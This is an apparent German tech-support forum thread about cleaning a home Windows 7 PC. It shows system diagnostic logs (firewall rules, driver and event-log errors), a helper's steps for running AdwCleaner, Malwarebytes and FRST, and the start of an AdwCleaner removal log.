FirewallRules: [UDP Query User{F7DE5662-1CF5-4B3B-BD74-2EB8428174E5}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [{DEB02161-3321-47A0-AEA7-B2383C6BA060}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{FB4E551E-3204-49F0-B2E0-CB812EE3A090}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{6A2AD480-2EC5-4D0D-8CB4-7039D1BBB43E}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{8651B310-EA93-453B-AD4F-40F2F79E12F0}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{908DEC77-2B49-4353-9F1D-67741687723B}] => (Allow) C:\Users\Ízkan\AppData\Roaming\Allmyapps\Allmyapps.exe
FirewallRules: [{BC440707-1268-4FE6-8896-03C83B5CFA5A}] => (Allow) LPort=80
FirewallRules: [{7C191149-D60C-454F-BB4A-F7265ACB46CF}] => (Allow) LPort=443
FirewallRules: [{96971A66-F6FB-41DF-821C-21A0F7C12744}] => (Allow) LPort=20010
FirewallRules: [{E9BB6E6B-67B0-45E3-8623-49821FF5A323}] => (Allow) LPort=3478
FirewallRules: [{A4796F1F-3471-40D3-82D3-67944C8F43DE}] => (Allow) LPort=7850
FirewallRules: [{38C3ED5B-5D9E-45AE-A2AC-2207C39E6DA2}] => (Allow) LPort=7852
FirewallRules: [{1CB0A71B-E2AE-43F6-97D1-91A6597BB8DB}] => (Allow) LPort=7853
FirewallRules: [{05C3202C-A18B-442D-A41A-6A7E5A065476}] => (Allow) LPort=27022
FirewallRules: [{F2027DFF-A0EE-4864-AFDA-5CC65BF9DCCF}] => (Allow) LPort=6881
FirewallRules: [{9F9F40DE-AE70-402C-8933-01A2A8BBE4F0}] => (Allow) LPort=33333
FirewallRules: [{DE71CD73-ADBE-4568-B562-DF04FE72D7AF}] => (Allow) LPort=20443
FirewallRules: [{164E1F9E-F18B-426F-9465-FCACC259547D}] => (Allow) LPort=8090
FirewallRules: [{1B75EAAA-850B-495E-B33B-11EE792B861A}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
FirewallRules: [{4810EF78-A419-472B-83C2-A984D46F0A45}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
FirewallRules: [{E209841A-EAD7-48BF-A32C-16171256B2BE}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
FirewallRules: [{EE245FBD-7B09-4516-A65F-98112C18D269}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
FirewallRules: [{C39A06DD-8B8E-4B76-B572-6843C4A5E418}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{45E9FB0F-2578-4E3B-A99E-D01C3F9E6B8C}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{3AB4B367-747D-4F9C-804F-8FAAE655C533}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{3B95664C-65E3-4BF5-9451-4D722331E4F7}] => (Allow) LPort=2869
FirewallRules: [{4E8A21D5-4E9C-4ED4-926B-A82DA60AE973}] => (Allow) LPort=1900
FirewallRules: [{4705FBF4-0593-4D22-8199-94CEDA53A957}] => (Allow) C:\Users\Özkan\AppData\Roaming\Spotify\spotify.exe
FirewallRules: [{C164648D-CE05-4A1E-A788-D034663CDEBF}] => (Allow) C:\Users\Özkan\AppData\Roaming\Spotify\spotify.exe
FirewallRules: [{3FE1533B-F968-442A-B4F5-0C0D9A5FF04C}] => (Allow) C:\ProgramData\NexonEU\NGM\NGM.exe
FirewallRules: [{2285214F-608D-43DE-8C80-3D7C66FC8182}] => (Allow) C:\ProgramData\NexonEU\NGM\NGM.exe
FirewallRules: [{9DF2F638-22A2-46EF-8561-26D2A88308F8}] => (Allow) C:\Nexon\Combat Arms EU\NMService.exe
FirewallRules: [{8595951D-5034-4341-935A-AE3B325BDA5E}] => (Allow) C:\Nexon\Combat Arms EU\NMService.exe
FirewallRules: [{0EC9DAF6-6768-4531-BA4B-FF70797749AF}] => (Allow) C:\Nexon\Combat Arms EU\NMService.exe
FirewallRules: [{DCFCEE64-AD4E-401B-AE64-2A933CC8B06B}] => (Allow) C:\Nexon\Combat Arms EU\NMService.exe
FirewallRules: [{9DBCB308-62B2-43B7-B834-B92F772D5BA2}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{4FF22754-95A5-4C16-96BD-19F379D43BA8}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{4D8AD6F5-E15E-42D7-900E-F5CF7C66F18D}] => (Allow) C:\Program Files (x86)\Sony Mobile\Update Engine\Sony Mobile Update Engine.exe
FirewallRules: [{804B76B7-81D0-4E6C-B3B4-FB3FE61D906E}] => (Allow) C:\Program Files (x86)\Sony Mobile\Update Engine\Sony Mobile Update Engine.exe
FirewallRules: [{19FE12BD-5FC0-42A9-8DDC-B9341ECE8035}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\MxUp.exe
FirewallRules: [{F6026884-630E-4C24-8660-C5E9F3149291}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\Maxthon.exe
FirewallRules: [{BAF800C1-4858-4E81-AAA1-5780BF1D964C}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\Maxthon.exe
FirewallRules: [{8CC7783F-D8C9-4A9B-8EB6-41D53FB062EA}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\MxUp.exe
FirewallRules: [TCP Query User{940C46C6-246A-46A5-B467-A27182698428}C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{4E9D9BF5-3C86-4073-8E64-0AFE455126B7}C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [TCP Query User{6B12E4F9-CDC9-43DB-83C4-110775A1D429}C:\program files (x86)\gameforgelive\games\deu_deu\aion\nclauncher.exe] => (Allow) C:\program files (x86)\gameforgelive\games\deu_deu\aion\nclauncher.exe
FirewallRules: [UDP Query User{C2165E93-9A8C-4891-A7D0-4DD9D43D2DEB}C:\program files (x86)\gameforgelive\games\deu_deu\aion\nclauncher.exe] => (Allow) C:\program files (x86)\gameforgelive\games\deu_deu\aion\nclauncher.exe
FirewallRules: [{0266C16B-9DB0-45AB-BDD1-F548726A58D5}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{773C6A1C-230F-452A-93C5-0FC1E4ABA5CB}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{AAC0A1FB-6DFC-48E8-B16F-0B4F3298645F}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{366A568C-F27E-4DC5-848A-F4B53B92FCFB}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [TCP Query User{21B94E54-1DD2-4BF8-8F8D-C93DB82A0732}C:\program files\java\jre7\bin\javaw.exe] => (Allow) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{8D8D07C1-334E-4BD2-B252-CBCD0B52002F}C:\program files\java\jre7\bin\javaw.exe] => (Allow) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [{05A0E04F-8AAF-4A75-BB40-4AFC757DD5FF}] => (Block) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [{C11F5AA4-5B00-4016-A476-CE3CBF976E8D}] => (Block) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [TCP Query User{51A23985-93D0-4E0D-8F5C-BF39FFEC4644}C:\users\özkan\documents\bilder\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\bilder\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{4B828C4D-0982-487B-8883-D60F9FA4BAAE}C:\users\özkan\documents\bilder\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\bilder\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{B7255A14-3607-4171-9CD6-F3BDC9B8B9E6}] => (Allow) C:\Users\Özkan\Documents\logs\Downloads\PBPHInstaller.exe
FirewallRules: [{F3B2B4AA-7F9D-474F-95C6-E16EFA8C9AA9}] => (Allow) C:\Users\Özkan\Documents\logs\Downloads\PBPHInstaller.exe
FirewallRules: [{34970EB3-AF92-4064-AEB5-9560FA11B08F}] => (Allow) C:\Users\Özkan\Documents\my games\PB\GameData\ggdllhost.exe
FirewallRules: [{2AC5FFB5-A3F7-4FAB-BC03-C85A8E1644EA}] => (Allow) C:\Users\Özkan\Documents\my games\PB\gamedata\ggdllhost.exe
FirewallRules: [TCP Query User{9E19711D-48FE-4E48-A1B6-3C60ADECE9B5}C:\users\özkan\documents\my games\pb\gamedata\updatemanager.exe] => (Allow) C:\users\özkan\documents\my games\pb\gamedata\updatemanager.exe
FirewallRules: [UDP Query User{97AEAA5A-B3B7-4B54-A56E-89642AC83A9D}C:\users\özkan\documents\my games\pb\gamedata\updatemanager.exe] => (Allow) C:\users\özkan\documents\my games\pb\gamedata\updatemanager.exe
FirewallRules: [{245A956D-8AE0-44ED-94A2-5A64174DBB0D}] => (Allow) C:\Users\Özkan\Documents\my games\PB\gamedata\Apps\PB\PointBlank.exe
FirewallRules: [{EBB5EF62-323E-4338-A3DA-A72903F9C975}] => (Allow) C:\Users\Özkan\Documents\my games\PB\gamedata\Apps\PB\PointBlank.exe
FirewallRules: [TCP Query User{B11EA2A9-155D-44B0-9ACE-908512AA000A}C:\users\özkan\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\özkan\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{00A2042E-C388-4F6C-8920-B20565A77CAF}C:\users\özkan\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\özkan\appdata\local\akamai\netsession_win.exe
FirewallRules: [TCP Query User{C5C5DA2C-5336-480B-AEF7-C0F37A75F090}C:\nexon\combat arms eu\engine.exe] => (Block) C:\nexon\combat arms eu\engine.exe
FirewallRules: [UDP Query User{3C3BEC0A-FF69-4BE2-A48D-736D61978D94}C:\nexon\combat arms eu\engine.exe] => (Block) C:\nexon\combat arms eu\engine.exe
FirewallRules: [TCP Query User{EDAA3D02-CDD5-48A2-8916-444CC0384F0C}C:\users\özkan\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\özkan\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{2C2A5F9A-68C3-4A9A-85FF-73CB7DB44762}C:\users\özkan\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\özkan\appdata\local\akamai\netsession_win.exe
FirewallRules: [TCP Query User{6CE5FEB5-A568-4611-8849-0BF6CC500E54}C:\users\özkan\documents\my games\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\my games\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{7D7C9632-5344-4D54-B217-A0708A7A0D69}C:\users\özkan\documents\my games\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\my games\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{DB391465-5607-4DF5-8EFD-68EC00796E86}] => (Allow) LPort=49167
FirewallRules: [{B70F1942-FCA8-48D6-BC69-5A1656946DE3}] => (Allow) LPort=5000
FirewallRules: [{E746A689-6A3F-43C1-B4DB-417A6A94FFB2}] => (Allow) C:\Program Files (x86)\GameforgeLive\Games\DEU_deu\Elsword\data\x2.exe
FirewallRules: [{CA0FC397-EA45-471B-81B7-D14162A6176F}] => (Allow) C:\Program Files (x86)\GameforgeLive\Games\DEU_deu\Elsword\data\x2.exe
FirewallRules: [TCP Query User{AD6D5770-A47B-400B-80CA-B1C5E921F286}C:\users\özkan\documents\my games\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\my games\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{D326B361-0FAC-423D-A8CF-CEF634518F79}C:\users\özkan\documents\my games\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\my games\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [TCP Query User{1CA208CC-0E60-4D7A-9F95-D647FFE96F58}C:\program files (x86)\warlord ii\game.bin] => (Allow) C:\program files (x86)\warlord ii\game.bin
FirewallRules: [UDP Query User{B6F84916-7DA1-4560-BF08-B3F6D4B8267C}C:\program files (x86)\warlord ii\game.bin] => (Allow) C:\program files (x86)\warlord ii\game.bin
FirewallRules: [TCP Query User{4CCF479B-249D-4329-827B-06BE36F6F976}C:\users\özkan\documents\spiele emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\spiele emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{B8B3BF25-2D6C-4AE8-8168-93CAC43DA23C}C:\users\özkan\documents\spiele emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\spiele emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{4D37D830-802A-4B82-AE5C-5702D45A013C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\GarrysMod\hl2.exe
FirewallRules: [{4547DE26-8CE8-4BE9-8FC6-6CAD6B07F718}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\GarrysMod\hl2.exe
FirewallRules: [TCP Query User{01DE63FC-FD42-48D1-8BC1-E3B7F19CB46F}C:\users\özkan\documents\spiele emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\spiele emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{08367BCB-2D3E-4464-9A42-C48FA412F362}C:\users\özkan\documents\spiele emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\spiele emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{F369092F-4781-4874-AC7B-DB4E99FD9FF2}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A1FC346F-ED08-43C6-AA21-419E63D1F90D}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{22A0AB29-3F15-4578-B976-FF69A53E577F}C:\users\özkan\documents\spiele emre\emre\terraria 1.2.1.2\terrariaserver.exe] => (Allow) C:\users\özkan\documents\spiele emre\emre\terraria 1.2.1.2\terrariaserver.exe
FirewallRules: [UDP Query User{65FE8B49-176E-4AFE-B39E-10FEAC40F603}C:\users\özkan\documents\spiele emre\emre\terraria 1.2.1.2\terrariaserver.exe] => (Allow) C:\users\özkan\documents\spiele emre\emre\terraria 1.2.1.2\terrariaserver.exe
FirewallRules: [TCP Query User{14016099-6DF5-4626-B91A-F0001D41369D}C:\users\özkan\documents\spiele emre\emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\spiele emre\emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{09B65F16-F90A-4E46-9528-E91A99B97B6B}C:\users\özkan\documents\spiele emre\emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\spiele emre\emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{C861E8A0-8C5D-4E5D-A1AF-AEFE85D9DDCB}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Call of Duty Modern Warfare 3\iw5mp.exe
FirewallRules: [{FB66CB97-5B56-4B66-88FE-D7CB13FE2C9E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Call of Duty Modern Warfare 3\iw5mp.exe
FirewallRules: [{0C478274-2C5D-4403-BC56-C1E8088DDB41}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{805DD0DD-BF67-4E58-8B1E-20B33ACE9025}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{5F74B1AE-2578-474A-9698-777F42CCA0AA}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A3D912ED-1EDF-4114-AF43-C92F0FE363FD}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{3966C528-4AE3-462C-AEDE-2CC007CF2E37}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe

==================== Fehlerhafte Geräte im Gerätemanager =============

Name: BitDefender Firewall NDIS 6 Filter Driver
Description: BitDefender Firewall NDIS 6 Filter Driver
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer: 
Service: BdfNdisf
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.

Name: tbfd_1_10_0_16
Description: tbfd_1_10_0_16
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer: 
Service: tbfd_1_10_0_16
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.

Name: innfd_1_10_0_14
Description: innfd_1_10_0_14
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer: 
Service: innfd_1_10_0_14
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.

Name: Microsoft-Adapter für Miniports virtueller WiFis
Description: Microsoft-Adapter für Miniports virtueller WiFis
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: vwifimp
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: Broadcom NetLink (TM) Gigabit Ethernet
Description: Broadcom NetLink (TM) Gigabit Ethernet
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Broadcom
Service: k57nd60a
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (12/21/2015 02:17:53 PM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005

Error: (12/21/2015 01:58:47 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: steamwebhelper.exe, Version: 3.17.73.86, Zeitstempel: 0x566f1544
Name des fehlerhaften Moduls: libcef.dll, Version: 3.2526.1348.0, Zeitstempel: 0x5643e1a9
Ausnahmecode: 0xc0000005
Fehleroffset: 0x00e2f176
ID des fehlerhaften Prozesses: 0x1194
Startzeit der fehlerhaften Anwendung: 0xsteamwebhelper.exe0
Pfad der fehlerhaften Anwendung: steamwebhelper.exe1
Pfad des fehlerhaften Moduls: steamwebhelper.exe2
Berichtskennung: steamwebhelper.exe3

Error: (12/20/2015 09:17:19 PM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005

Error: (12/19/2015 08:56:15 AM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005

Error: (12/19/2015 01:58:43 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programm ts3client_win64.exe, Version 3.0.18.2 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Wartungscenter-Systemsteuerung, um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 98c

Startzeit: 01d139c6e1c74cec

Endzeit: 6

Anwendungspfad: C:\Users\Özkan\AppData\Local\TeamSpeak 3 Client\ts3client_win64.exe

Berichts-ID: a39ae032-a5eb-11e5-b7d2-9e2a84b93483

Error: (12/18/2015 08:04:12 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programm ts3client_win64.exe, Version 3.0.18.2 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Wartungscenter-Systemsteuerung, um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: ad4

Startzeit: 01d139c500347672

Endzeit: 20

Anwendungspfad: C:\Users\Özkan\AppData\Local\TeamSpeak 3 Client\ts3client_win64.exe

Berichts-ID: 188e838d-a5ba-11e5-b7d2-9e2a84b93483

Error: (12/18/2015 02:11:45 PM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005

Error: (12/17/2015 04:08:55 PM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005

Error: (12/16/2015 08:22:04 PM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005

Error: (12/16/2015 02:16:54 PM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005


Systemfehler:
=============
Error: (12/21/2015 08:06:29 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Google Update-Dienst (gupdate)" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%2

Error: (12/21/2015 08:04:27 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: Das Laden folgender Boot- oder Systemstarttreiber ist fehlgeschlagen: 
BdfNdisf
innfd_1_10_0_14
tbfd_1_10_0_16

Error: (12/21/2015 08:04:20 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Tender Switch" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%2

Error: (12/21/2015 08:04:18 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Mobizen plugin" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%2

Error: (12/21/2015 04:16:39 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Google Update-Dienst (gupdate)" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%2

Error: (12/21/2015 04:14:37 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: Das Laden folgender Boot- oder Systemstarttreiber ist fehlgeschlagen: 
BdfNdisf
innfd_1_10_0_14
tbfd_1_10_0_16

Error: (12/21/2015 04:14:31 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Tender Switch" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%2

Error: (12/21/2015 04:14:28 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Mobizen plugin" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%2

Error: (12/21/2015 10:14:09 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Google Update-Dienst (gupdate)" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%2

Error: (12/21/2015 10:12:07 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: Das Laden folgender Boot- oder Systemstarttreiber ist fehlgeschlagen: 
BdfNdisf
innfd_1_10_0_14
tbfd_1_10_0_16


==================== Speicherinformationen =========================== 

Prozessor: Intel(R) Celeron(R) CPU B830 @ 1.80GHz
Prozentuale Nutzung des RAM: 66%
Installierter physikalischer RAM: 3932.36 MB
Verfügbarer physikalischer RAM: 1303.85 MB
Summe virtueller Speicher: 7862.93 MB
Verfügbarer virtueller Speicher: 5562.71 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:465.66 GB) (Free:176.97 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: BC5E5834)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=465.7 GB) - (Type=07 NTFS)

==================== Ende von Addition.txt ============================

Bootsektor · 21.12.2015, 23:09

Hallo,

ja, da ist so einiges was da nicht hingehört.

Wie sieht es nach folgenden Schritten aus?
Schritt 1
Downloade Dir bitte

AdwCleaner auf deinen Desktop.

Schließe alle offenen Programme und Browser. Bebilderte Anleitung zu AdwCleaner.
Starte die AdwCleaner.exe mit einem Doppelklick.
Stimme den Nutzungsbedingungen zu.
Klicke auf Optionen und vergewissere dich, dass die folgenden Punkte ausgewählt sind:
- "Tracing" Schlüssel löschen
- Winsock Einstellungen zurücksetzen
- Proxy Einstellungen zurücksetzen
- Internet Explorer Richtlinien zurücksetzen
- Chrome Richtlinien zurücksetzen
- Stelle sicher, dass alle 5 Optionen wie hier dargestellt, ausgewählt sind
Klicke auf Suchlauf und warte bis dieser abgeschlossen ist.
Klicke nun auf Löschen und bestätige auftretende Hinweise mit Ok.
Dein Rechner wird automatisch neu gestartet. Nach dem Neustart öffnet sich eine Textdatei. Poste mir deren Inhalt mit deiner nächsten Antwort.
Die Logdatei findest du auch unter C:\AdwCleaner\AdwCleaner[Cx].txt. (x = fortlaufende Nummer).

Schritt 2
Downloade Dir bitte

Malwarebytes Anti-Malware

Installiere das Programm in den vorgegebenen Pfad. (Bebilderte Anleitung zu MBAM)
Starte Malwarebytes' Anti-Malware (MBAM).
Klicke im Anschluss auf Scannen, wähle den Bedrohungssuchlauf aus und klicke auf Suchlauf starten.
Lass am Ende des Suchlaufs alle Funde (falls vorhanden) in die Quarantäne verschieben. Klicke dazu auf Auswahl entfernen.
Lass deinen Rechner ggf. neu starten, um die Bereinigung abzuschließen.
Starte MBAM, klicke auf Verlauf und dann auf Anwendungsprotokolle.
Wähle das neueste Scan-Protokoll aus und klicke auf Export. Wähle Textdatei (.txt) aus und speichere die Datei als mbam.txt auf dem Desktop ab. Das Logfile von MBAM findest du hier.
Füge den Inhalt der mbam.txt mit deiner nächsten Antwort hinzu.

Schritt 3
Starte noch einmal FRST.

Setze den Haken bei addition.txt und drücke auf Scan.
Wenn der Scan abgeschlossen ist, werden zwei neue Logfiles FRST.txt und addition.txt erstellt und auf dem Desktop (oder in dem Verzeichnis in dem FRST liegt) gespeichert.
Poste den Inhalt dieser Logfiles bitte hier in deinen Thread.

EmreTprk · 22.12.2015, 12:21

AdwCleaner Logfile:

Code:

ATTFilter

# AdwCleaner v5.026 - Bericht erstellt am 21/12/2015 um 23:18:07
# Aktualisiert am 21/12/2015 von Xplode
# Datenbank : 2015-12-21.3 [Server]
# Betriebssystem : Windows 7 Ultimate Service Pack 1 (x64)
# Benutzername : Özkan - EASYNOTE
# Gestartet von : C:\Users\Özkan\Documents\logs\Downloads\adwcleaner_5.026.exe
# Option : Löschen
# Unterstützung : Forum - ToolsLib

***** [ Dienste ] *****

[-] Dienst Gelöscht : innfd_1_10_0_14
[-] Dienst Gelöscht : tbfd_1_10_0_16

***** [ Ordner ] *****

[-] Ordner Gelöscht : C:\Program Files\Conduit
[-] Ordner Gelöscht : C:\Program Files\SavingsbullFilter
[-] Ordner Gelöscht : C:\Program Files (x86)\Conduit
[-] Ordner Gelöscht : C:\Program Files (x86)\SNT
[-] Ordner Gelöscht : C:\Program Files (x86)\Systweak Support Dock
[-] Ordner Gelöscht : C:\Program Files (x86)\SystemPreserve
[-] Ordner Gelöscht : C:\Program Files (x86)\YoutubeAdblocker
[!] Ordner Nicht Gelöscht : C:\Program Files (x86)\YoutubeAdblocker
[-] Ordner Gelöscht : C:\ProgramData\apn
[-] Ordner Gelöscht : C:\ProgramData\Babylon
[-] Ordner Gelöscht : C:\ProgramData\House Of Soft
[-] Ordner Gelöscht : C:\ProgramData\MountainApp
[-] Ordner Gelöscht : C:\ProgramData\SNT
[-] Ordner Gelöscht : C:\ProgramData\WPM
[-] Ordner Gelöscht : C:\ProgramData\Allmyapps
[-] Ordner Gelöscht : C:\ProgramData\YoutubeAdblocker
[-] Ordner Gelöscht : C:\ProgramData\webbsauvE
[-] Ordner Gelöscht : C:\ProgramData\webSaove
[!] Ordner Nicht Gelöscht : C:\ProgramData\YoutubeAdblocker
[-] Ordner Gelöscht : C:\ProgramData\3d0a37a800000c8d
[-] Ordner Gelöscht : C:\ProgramData\460804d7b62ababa
[-] Ordner Gelöscht : C:\ProgramData\5046288706989374138
[-] Ordner Gelöscht : C:\ProgramData\6acef0df000016fa
[-] Ordner Gelöscht : C:\ProgramData\{c9728bcd-ea62-4578-c972-28bcdea62f37}
[-] Ordner Gelöscht : C:\ProgramData\fmkcnflhkcgkdkchbdminbbekojbfhmc
[-] Ordner Gelöscht : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Uniblue
[-] Ordner Gelöscht : C:\Users\Gast\AppData\Local\torch
[-] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Crossbrowse
